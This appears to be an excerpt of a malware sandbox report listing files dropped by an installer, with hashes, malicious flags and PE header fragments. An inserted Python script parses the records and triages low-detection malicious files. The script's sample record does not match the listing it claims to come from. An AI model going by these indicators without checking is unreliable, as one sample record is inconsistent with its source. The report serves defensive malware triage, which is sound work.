                                                                                                                                                                                                                                        Entropy (8bit):6.4092046609596345
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:IrAq6D1711KHSPJuxXG4WyvHA2hU3TZlHMHE7GHGHS+HgH/HoHsH5Wr6Pq7Gsjet:IrAq6D1711KHSPwx24WyvHA2hU3TZlHM
                                                                                                                                                                                                                                        MD5:A3A691724ED0DE2B86261B67AAB1C8D5
                                                                                                                                                                                                                                        SHA1:AC7EC2AFA40930B947B4838B7FC03C5A12B6A573
                                                                                                                                                                                                                                        SHA-256:6F0BAC85CEFC7B4223750418A4EF3CFD6F874433DB4A8C1A0DC1651BB6395E88
                                                                                                                                                                                                                                        SHA-512:938C249E329FA6EE7923CA4563F6E11C24133093EA5E73FF2FDD3BC073AA82B407D9CD0828A4F7B1D31ADEDDEFB375651C3E429078A2735717FFA25E0A157ECB
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L......^...........!.....@...................P....@.................................;................................ ..j.......m*...0...................G...........................................................................................text....@.......:.................. ..`.data........P.......@..............@....tls.................8..............@....idata...0.......,...:..............@..@.edata....... .......f..............@..@.rsrc........0.......j..............@..@
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):347864
                                                                                                                                                                                                                                        Entropy (8bit):6.514122855027409
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:nAQuAk+1NI9ZJ/ZCioG9EoE4ckAc2AOrWYcr67:nAQuAerFoG9hVMhLcr67
                                                                                                                                                                                                                                        MD5:967ADECC4C7B3915E3D04BC05DA2F679
                                                                                                                                                                                                                                        SHA1:3A12B1C7169B8FA839236F30F222A36D12EEE70E
                                                                                                                                                                                                                                        SHA-256:96F9946C1ADE394B49533E765809DFE9258294C0277B89026F5FC11106FE7CA1
                                                                                                                                                                                                                                        SHA-512:99D1E7B163A046138C784449BE389B175B28FD5026238982CEE561A0FF8F201D2123216D3F776E183F4C6E32FFB8ED46990AD12DE088C8EE7E01D39A6A4FBE0C
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k-.l.~.l.~.l.~.....l.~....1l.~.....l.~4....l.~.....l.~.....l.~.....l.~.....l.~.l.~.l.~0....l.~0..~.l.~0....l.~Rich.l.~........................PE..L...F.._.................h..........U.............@..........................`............@.................................\...(.......`............"...,... ...<..PZ..p...................`[.......Z..@...............@............................text...:g.......h.................. ..`.rdata..tO.......P...l..............@..@.data....1.......$..................@....rsrc...`...........................@..@.reloc...<... ...>..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):293336
                                                                                                                                                                                                                                        Entropy (8bit):6.3387704733743675
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:e6w9S8XR5N3W5a46zG0WkGgcaWALhrkw/FKn0HH:RwM8h5Nm5aRi0bWALhrz9K0H
                                                                                                                                                                                                                                        MD5:3DF62B62984471E2DCD1C69EA5FDD182
                                                                                                                                                                                                                                        SHA1:8F28C3F78588B1F307882AD5512934A93E98322E
                                                                                                                                                                                                                                        SHA-256:07A5CEB6E6EFB996690AEDF18221F18644FCEAF94501722B10B75A139EA3899C
                                                                                                                                                                                                                                        SHA-512:434A19429E672A68D26A02E29388A09B1CAAA3051082DDC4E141AF3AC53FAEFAD05CF3245D9A015EC7A3BBB1B573CD822B1B10079568F48F350D69818E16AA21
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........`.5..zf..zf..zf.y.f..zf.t~g..zf.tyg..zf.t.g..zf.t{g..zf.~g..zf.{g..zf..{fN.zf.h.g..zf.tsg..zf.tzg..zf.t.f..zf...f..zf.txg..zfRich..zf........................PE..d...^.Vf.........." ....."...0.......................................................4....`.............................................x....................P...$...P...)......0......p...........................@...8............@...............................text...N!.......".................. ..`.rdata.."....@.......&..............@..@.data........@......................@....pdata...$...P...&... ..............@..@.rsrc................F..............@..@.reloc..0............L..............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2806
                                                                                                                                                                                                                                        Entropy (8bit):3.9239610717683986
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:MV3hrMZGYvAOPOrgkAVllg1NJa6PrjAXFZ6xOHZAFZ6xOHKjAFZArXzXhs+U+a8q:MnZoAOPOrgkA9g1NJa6PrjAVZakZGZaO
                                                                                                                                                                                                                                        MD5:E9D04A488B2901DEB37AD99D77740857
                                                                                                                                                                                                                                        SHA1:9AD315E085E55166267A78387DD98D5EA72E8BF6
                                                                                                                                                                                                                                        SHA-256:A3A195DEB84E27D8A05324949C3D5905BEAA05BAD572D6A3C4A00A693155E4D5
                                                                                                                                                                                                                                        SHA-512:4D33225331BDBAF3E9ACF7BF2D8A79BCD9E4276AB72E98307460262C9FBE0ADBFDBE22A786290111557C6A90EF6D19EC02FD2777F47B41E19755BE72BB6F88D7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:......[.H.W.I.n.f.o.].....m.o.d.e.l._.n.a.m.e.=.'.R.O.G. .S.T.R.I.X. .B.5.5.0.-.F. .G.A.M.I.N.G. .(.W.I.-.F.I.).'.....m.a.n.u.f.a.c.t.u.r.e.r.=.'.A.S.U.S.T.e.K. .C.O.M.P.U.T.E.R. .I.N.C...'.....f.r.e.q.=.'.3.9.'.....c.p.u._.m.a.n.u.f.a.c.t.u.r.e.r.=.'.A.u.t.h.e.n.t.i.c.A.M.D.'.....c.p.u._.m.o.d.e.l._.n.a.m.e.=.'.A.M.D. .R.y.z.e.n. .9. .5.9.5.0.X. .1.6.-.C.o.r.e. .P.r.o.c.e.s.s.o.r. . . . . . . . . . . . .'.....d.r.a.m._.s.i.z.e.=.'.1.7.1.7.9.8.6.9.1.8.4.,.1.7.1.7.9.8.6.9.1.8.4.'.....d.r.a.m._.m.a.n.u.f.a.c.t.u.r.e.r.=.'.K.i.n.g.s.t.o.n.,.K.i.n.g.s.t.o.n.'.....d.r.a.m._.f.r.e.q.u.e.n.c.y.=.'.2.4.0.0.,.2.4.0.0.'.....s.t.o.r.a.g.e._.c.a.p.a.c.i.t.y.=.'.1.8.6.3. .G.B.,.1.8.6.3. .G.B.,.9.3.2. .G.B.,.1.8.6.3. .G.B.,.9.3.2. .G.B.'.....s.t.o.r.a.g.e._.i.n.t.e.r.f.a.c.e.=.'.S.S.D.,.S.S.D.,.S.S.D.,.S.S.D.,.S.S.D.'.....n.i.c._.m.o.d.e.l._.n.a.m.e.=.'.I.n.t.e.l.(.R.). .W.i.-.F.i. .6. .A.X.2.0.0. .1.6.0.M.H.z.(.O.n.B.o.a.r.d.).,.I.n.t.e.l.(.R.). .E.t.h.e.r.n.e.t. .C.o.n.t.r.o.l.l.e.r. .(.3.). .I.2.
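The records above are what an analyst actually works from: every PE dropped by the temporary installer copy under is-HT2JP.tmp is marked Malicious:true by the sandbox while the single listed scanner (ReversingLabs) reports 0% detection, and one dropped file is not a PE at all but a UTF-16 LE text file whose preview starts with a [HWInfo] section. The following is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses records in the key:value layout used by this listing, checks that each hash field has the length and alphabet of its algorithm, lists the PE files that are flagged malicious with no AV coverage so their SHA-256 values can be used as indicators, and recovers readable lines from the UTF-16 preview. The SAMPLE text is constructed from three of the records above (leading whitespace stripped, previews truncated); the field layout and the '•' AV bullet are inferred from those records rather than taken from a documented report schema, and the preview decoding assumes that the report renders every non-printable byte as '.'.

```python
import re

# Added example, not part of the Joe Sandbox report. SAMPLE is constructed from three records in
# the listing above (leading whitespace stripped, previews truncated); the key:value field layout
# and the '•' AV bullet are inferred from those records, not from a documented report schema.
SAMPLE = r"""
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Size (bytes):316304
Entropy (8bit):6.336244135441085
MD5:6B03FCC62387FC2107801EC86D8CB2F9
SHA1:FCCD3492E7225BE0CA8AA485D94995D3B1B979C2
SHA-256:3D4A8CD51FCA82BD7B3AE9710690EACA11FB0D6270142A7FCD6E89EF7DA7AE96
SHA-512:EC93BADF11F218893AF6FA1064C4C593A5C28CE1A0B59FB344AAC7731C55766AA66579890DE6C4D074D4A27DFB80E0BD69D1B99F05BA35EAD44E3626FEB3E87B
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Size (bytes):1125776
Entropy (8bit):6.4092046609596345
MD5:A3A691724ED0DE2B86261B67AAB1C8D5
SHA1:AC7EC2AFA40930B947B4838B7FC03C5A12B6A573
SHA-256:6F0BAC85CEFC7B4223750418A4EF3CFD6F874433DB4A8C1A0DC1651BB6395E88
SHA-512:938C249E329FA6EE7923CA4563F6E11C24133093EA5E73FF2FDD3BC073AA82B407D9CD0828A4F7B1D31ADEDDEFB375651C3E429078A2735717FFA25E0A157ECB
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Size (bytes):2806
Entropy (8bit):3.9239610717683986
MD5:E9D04A488B2901DEB37AD99D77740857
SHA1:9AD315E085E55166267A78387DD98D5EA72E8BF6
SHA-256:A3A195DEB84E27D8A05324949C3D5905BEAA05BAD572D6A3C4A00A693155E4D5
SHA-512:4D33225331BDBAF3E9ACF7BF2D8A79BCD9E4276AB72E98307460262C9FBE0ADBFDBE22A786290111557C6A90EF6D19EC02FD2777F47B41E19755BE72BB6F88D7
Malicious:false
Preview:......[.H.W.I.n.f.o.].....m.o.d.e.l._.n.a.m.e.=.'.R.O.G. .S.T.R.I.X. .B.5.5.0.-.F. .G.A.M.I.N.G. .(.W.I.-.F.I.).'.....m.a.n.u.f.a.c.t.u.r.e.r.=.'.A.S.U.S.T.e.K. .C.O.M.P.U.T.E.R. .I.N.C...'
"""
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA-256": 64, "SHA-512": 128}

def _detection_pct(av_lines):
    """Highest 'Detection: N%' over the AV bullet lines, or None when none is listed."""
    pcts = [int(m.group(1)) for m in map(lambda a: re.search(r"Detection:\s*(\d+)%", a), av_lines) if m]
    return max(pcts) if pcts else None

def parse_dropped_files(text):
    """One dict per record; a record starts at a 'Process:' line, AV bullets go into rec['av']."""
    records, rec = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Process:"):
            rec = {"av": []}
            records.append(rec)
        if not line or rec is None:          # blank lines, or header text before the first record
            continue
        if line.startswith("•"):
            rec["av"].append(line.lstrip("• "))
            continue
        key, sep, value = line.partition(":")
        if sep:
            rec[key.strip()] = value.strip()
    for rec in records:
        rec["detection"] = _detection_pct(rec["av"])
    return records

def validate_hashes(rec):
    """Problems with the hash fields: missing, wrong length for the algorithm, or not hex."""
    return [f"{k}: expected {n} hex chars, got {rec.get(k, '')!r}" for k, n in HASH_LEN.items()
            if not re.fullmatch(r"[0-9A-Fa-f]{%d}" % n, rec.get(k, ""))]

def triage(records, max_detection=0, packed_entropy=7.0):
    """PE files the sandbox marks malicious while listed AV detection is <= max_detection."""
    hits = []
    for rec in records:
        det = rec.get("detection")
        if (rec.get("File Type", "").startswith("PE32") and rec.get("Malicious") == "true"
                and det is not None and det <= max_detection):
            entropy = float(rec.get("Entropy (8bit)", "0"))
            hits.append({"sha256": rec["SHA-256"], "size": int(rec["Size (bytes)"]),
                         "entropy": entropy, "packed": entropy >= packed_entropy})
    return hits

def decode_utf16le_preview(preview, bom_bytes=2):
    """Recover ASCII lines from the preview of a UTF-16 LE text file. Assumption: the report
    renders every non-printable byte as '.', so for ASCII text the odd (0x00) bytes are dots and
    the even bytes after the BOM are the text; CR LF shows as '..' (a literal '..' is ambiguous)."""
    return [ln for ln in preview[bom_bytes::2].split("..") if ln]

if __name__ == "__main__":
    recs = parse_dropped_files(SAMPLE)
    for r in recs:
        print(r["SHA-256"], validate_hashes(r) or "hashes ok")
    print(triage(recs), decode_utf16le_preview(recs[2]["Preview"]), sep="\n")
```

Two caveats when using the output. A 0% figure here is the detection rate of the one scanner the report lists at analysis time, not evidence that the file is clean; the sandbox verdict and the behaviour signatures carry the weight, and the SHA-256 values are the stable thing to pivot on. The entropy flag is a coarse packing heuristic: the dropped PEs above sit around 6.3 to 6.5, which is ordinary compiled code, so none of them trips it. The is-HT2JP.tmp directory and the .tmp copy of the installer follow the naming used by Inno Setup, which is worth knowing when the same dropper path turns up in other reports.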
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):295384
                                                                                                                                                                                                                                        Entropy (8bit):6.384644936740942
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:+7BS1ak5I0CHEdGGgap8VywsC75bgs03d3tKRc/uk8QRYQrjRj332RYLwYwacyHd:QS1jzCMqLXv7GsStGcGCROYwYmq
                                                                                                                                                                                                                                        MD5:8D108CADED0B235B77A6A6C6A0D904B8
                                                                                                                                                                                                                                        SHA1:5C278A09C335B61C06E4CCB32D91C151400500F5
                                                                                                                                                                                                                                        SHA-256:AB7DBBA829D07BE48C7E45141BF769C4FFEBE86A78F170FD3EDAEE6B63A9D1F1
                                                                                                                                                                                                                                        SHA-512:F63C14071B12A89A1678B9AB291FAD8628F8FB24BC16880DED83A9F94DA73061394DE8EA322ECE71745BFA3273CE98BA80A5F8EB16F591F2A25CE3934A23837F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'...'...'...|..-...|.."...|......u...)...u...-...u.......|.. ...'...Z.......!.......&.....u.&...'...&.......&...Rich'...................PE..d.....f.........." .........`......X...............................................+.....`.................................................X...<............`..."...X...)..............p.......................(.......8............ ...............................text............................... ..`.rdata....... ......................@..@.data...."...0......................@....pdata..."...`...$...$..............@..@_RDATA...............H..............@..@.rsrc................J..............@..@.reloc...............P..............@..B........................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):359824
Entropy (8bit):6.39968191694886
Encrypted:false
SSDEEP:6144:u13VpUk0KVRK/LO2rr08yimMjITFohPqCnhGYEuu7N:aVp50Ki/LWkmFTFoBByuu7N
MD5:A2C2C8A50E3F93AD1C2F44AC23FDDBD3
SHA1:F1F046F1ADC63FFB6E159AA161FE5CD947518AF3
SHA-256:FF7013391FFFE0FFDA72F1DBE0ABDD8E73F7F3F85F3B99EE0E860C9004331211
SHA-512:8FBC2A4C9C80218E8DF5D21550B2BE323DD981AAD5EAFBB2C75AF5047387CDEDE70D12BFD0D6DB6A7F411A816B61DFFA32E4C35A747A457CC03E8BDEC2B85A9E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):272024
Entropy (8bit):6.401523708321372
Encrypted:false
SSDEEP:3072:jtIyoyUR96mycNRJ+JD3KJjCcyKVBd3BG/8R2HRExeobW:jeykR96mycPJ8mVBxBJ2Hqxeob
MD5:0EFE3D3758D3BFBAAAC4083008F4ADEA
SHA1:3A2277853EFAD84466235B0C2D2A3A622F7449B0
SHA-256:0E19F6DE21D787067F49238FC75B620F876AEDF112A9365F4A0A38B66DF63EC4
SHA-512:466E0899D43F097069F2D8FA386F29E5091E6D1D49351385749A67F0D59D81227CB9F3C48B96CD8FA3682FB29BA6D65D8A9906E69E4A2F8F50DFEB56816CD6F6
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):199128
Entropy (8bit):5.77155775659446
Encrypted:false
SSDEEP:3072:SJ613DnPspO8dsZ4olHTfEVFU6Vuu0tzbCwzayDwVqSrgIN4fICGs7:SO8d6ljEV+6Vu/dWs
MD5:A2E1203EFF93BF15342E88727FE5BE34
SHA1:CD95E9F872584411F08B26666F35E142C743C050
SHA-256:193790697CD9F9A90F924671294A80873FEF8636A2E0C6BA8D9A57B4F4434176
SHA-512:1E6D4E8FE940952132308C904CD9052A5E1035BA502B679FFEF044BA654084962DD4A59FB66B7686FAF369CAEE315E33CDE333CE3E8B11E46CD843898FB2F08C
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):139624
Entropy (8bit):6.1983818318989234
Encrypted:false
SSDEEP:3072:JM7Ef/ppaPmj51IxIAyBoKXVJpw5MWxRdd7FiQ/2x/:G7ybhYIAXKNwJxxN4
MD5:B0043B40E915D1A10FEF14A95C4E7F54
SHA1:CAE2D1DB34D64B4C043190E0106A0018BA0918AC
SHA-256:5FB3E9634343CB9F5052A310BE6C6E398B11AB0CCEE55B60D0D80F6CD24911C9
SHA-512:C0A8C234EBABAEC671A3CAA65F3304CBD5C2176CC92EB10520ADAC4600253F0A9B8DAF5302A7185244EFC4D604D722218CD2EA9368403754FAE31AAB3EF56D32
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):21
Entropy (8bit):3.8442328987631917
Encrypted:false
SSDEEP:3:WIVKLTpn:PgL1n
MD5:4FDD914244F257BA902260A7B65D05AE
SHA1:BE047B70DF80783B6693C88CEF7233CD86C7A2A3
SHA-256:CFF791C25B17603124B6B549A29963B3D0B771CB6ECC19002DE16A132F7EBACC
SHA-512:0938F16F3D681A30E9861E59EFCDE5C89E4F04D04DE2F457337032AC6D1E228B92E4489B8B45F0404A14179D08473719E2ACC4DDB4E8E8F782B66AB89EF633FF
Malicious:false
Preview:HWComponentPlugin.dll
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):1667544
Entropy (8bit):5.96495732757551
Encrypted:false
SSDEEP:49152:/cXMn2kbBdCEtvrPJIs4RbYI3kirPbRQe3e6d18bBHdC:/cc2k7pS
MD5:43B71C0A50EAF646CDF3BC7A0672B3E2
SHA1:56CC102402BB5FD86D8E5875050AFB7C71A6090D
SHA-256:CC50A7B0DF5274317D1B6A030E3AC33815F1C9D3A0EF813FFEC405E5D844D420
SHA-512:99BFD19E88F38D9BA80BEEC4C31FECEF4C46657098809DADD3FFAC8A3325D59335CEF2BC195124AA8D3933A25A66EE99CB27C1CDB8990E9E0F54577847B486CD
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):449496
Entropy (8bit):6.177250619165656
Encrypted:false
SSDEEP:12288:uf907Z9VXtV5w8VR4SfoTP2GcG6kZBK7+:s90t97w8VoKGcG6cBKC
MD5:75FB5858513B1A9C4555064196F2FFCF
SHA1:0658EAEBCE3932274DCF9958B83E08A8C2EB9568
SHA-256:988A1ED7B2125741C695103F532F99C9002FC14D6B3FCB6698CDF6AE4AA07BBE
SHA-512:D318E1B3CAC29B287E24D029D240828E2B858AF97CEBBE0A329AA1DE83FF4509A127FA229BE83CA43AB22FEABFEDB54802DE18A22EAF8245A65A6120899A131C
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 13472
Entropy (8bit): 6.292043114894753
Encrypted: false
SSDEEP: 192:WrB5jnA6+FpGKCRXEWfWlrWngbXH9YOCAs/nGfe4pBjSjM:WrnjnA6+MXEWfWlrIgbCA0GftpBj9
MD5: 8C454E6D06D56C19F355F702B15EBB15
SHA1: 6D4322B7BC25A50E0C5EFC80DD71824592D3A040
SHA-256: 3A1475D6F1A99AB2A85AFEDFF3DB6454D901EBF1DE1D58E294EA2CB16516648A
SHA-512: 6D1C221430668BE2C7DAAE9D27AAA621038F8F52F5AC3CF9A6D02D10F33E85718E08017E5CF6CDB9E2CB10CE66EB9212DCC6C88FB17C4FB486C7D71720B6BDFB
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 418696
Entropy (8bit): 6.021730081658021
Encrypted: false
SSDEEP: 6144:GIDKBfonoNFTFGQ1N421Ub9bNuAdlAzy/hA1h6H7BdCEtvrPJIs4u2bYIzK1I6hM:nnATFZ16bBdCEtvrPJIs4RbYIa
MD5: 5F4D7D0FC695C2FBC9BEA18271BA6778
SHA1: F116880355A4A8936CDD1FE953FCF126833DB0D8
SHA-256: E0ABCA4F407DD17B77EADE645114CC700397D99EE86CD6BF46DE7D7C8D8BCECA
SHA-512: 36B65443EED8FFF62ABB5AC2BA3C4641181F860EC93211F2F1363CCF3EDE5295C15D3021EB34DBF7A4AFCAFE56F087A3654036166455818367D6556622670956
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 368520
Entropy (8bit): 5.930673554971986
Encrypted: false
SSDEEP: 6144:tUheTc27502HNoekbDhKirPrppRQfbL8ysiZQM:tUheTc2FZ0DkirPbRQl
MD5: F8D78FFA9E4600984086B07C2C04C832
SHA1: 9C46C68E5F622E610292AD78D4F7A7CF2FB9E7EC
SHA-256: 2ECCA6B05A516090D3E97558ACCA7B89D908E34B7DD5B79DDEF74E6A8CBDE5B7
SHA-512: FEFA25C3869105C36D26FAF1422E3CEF2535B0B34BA995BF6F63360ED61746A98B5D30345064850D89C458EA73F4A252D4E9591B0321BB3E6C5F79C8AEAFD47A
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 305552
Entropy (8bit): 6.4083242939173815
Encrypted: false
SSDEEP: 6144:/YjMr0NcUTrHglzwsGqSqosoh/1iZX2ZIR:QjMrWcw0yXqNoT4+IR
MD5: 66AD0E987BADD3C3809E012EEF10E246
SHA1: F01A159E82366F127C88A26697416EB8C048AB8F
SHA-256: 848E341FD8859CAF431B1B1571AF0D84F07576CDF07298DA93CE9AD98064B03A
SHA-512: 87BFEBD0CC8B76BE541DD0838713A10960EFD9FE8AD83B9D54DBCDB9E0655A0F2976759465B8D91B8F9FD0DBA3E4A488F66F970101C5AA66923F1E29E6DE7DD2
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 663000
Entropy (8bit): 5.94538238272737
Encrypted: false
SSDEEP: 12288:WG86nitqrIT6Eqk56i258EJsUQUUJ9LBHd2U+:H7itqr3e6d18J9LBHd2F
MD5: 4A2FC86ED202B5E7378A7B84F947B2F1
SHA1: 6888E73A57D0C999725D57F68E9E16A6F729294F
SHA-256: 60605ED6CEFD158EDE7B6B2C2C6804765E8E5EFF602F232F337759C3D5DFD52B
SHA-512: E0FDE10265310D607519FB13FE7114B50E6160487AC0164393E78DD8346FF0BEBDEF9476166A4DB7CB86EEAE44A501F2372DD3AB5EF103323ACB9CD1C02710F8
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 358760
Entropy (8bit): 6.422019035317325
Encrypted: false
SSDEEP: 6144:bXxYSK5qJG+DnVj1+cyVf9pmrj9mUwlScRflohB5BC1IKWRtr:TKkM+DnV4cy99crEUIR9onD6WRd
MD5: B109529B212C9C19EFCB010940B43388
SHA1: FF3F223D5563051EF8E81A4D1BC8B1CA28EB6B13
SHA-256: 4AE8ECE6F610DF4902152B13971B5B4E2D75BB48BA632EFA55A47633EB918089
SHA-512: CAC516DF8792158697A33484D4C14960874210A684C428D21EEE6E4AE57A8D3157F5C414B016630AC58701227BF16E9101D294A7F37F2A1842DDAA2EC64DD30E
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):54824
Entropy (8bit):6.565299102080387
Encrypted:false
SSDEEP:768:IvYH6XbSX2iFeNlCERRLa0g7G/0+k3QSkVliAV6a7srzgUjFYicm0VNZoo:qXWFeNlCERRLa0gUEGQrz1jF7u1t
MD5:4E1D7DF7612E1EFB030592C5AE992BDE
SHA1:1DF24C667F581E49A7B3CB92DB6263B5039EB9CB
SHA-256:48D91CD358E37D57E43A58C992B5454F2A249E924AC2A13293E4105C102608A7
SHA-512:1CCA901DF70E3887A4CEEE6600E740D9B57E6573E793A87E501E813B8225FF8364EBAA1E0AE8AD2A69C8FFC691241CE643E02CAD152F92868F52A38AC8EAADCF
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmp
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6023664
Entropy (8bit):6.768988071491288
Encrypted:false
SSDEEP:98304:hcirJylHYab/6bMJsv6tWKFdu9CLiZxqfg8gwf:+irJylHFb/QMJsv6tWKFdu9CL4xqfg8x
MD5:817520432A42EFA345B2D97F5C24510E
SHA1:FEA7B9C61569D7E76AF5EFFD726B7FF6147961E5
SHA-256:8D2FF4CE9096DDCCC4F4CD62C2E41FC854CFD1B0D6E8D296645A7F5FD4AE565A
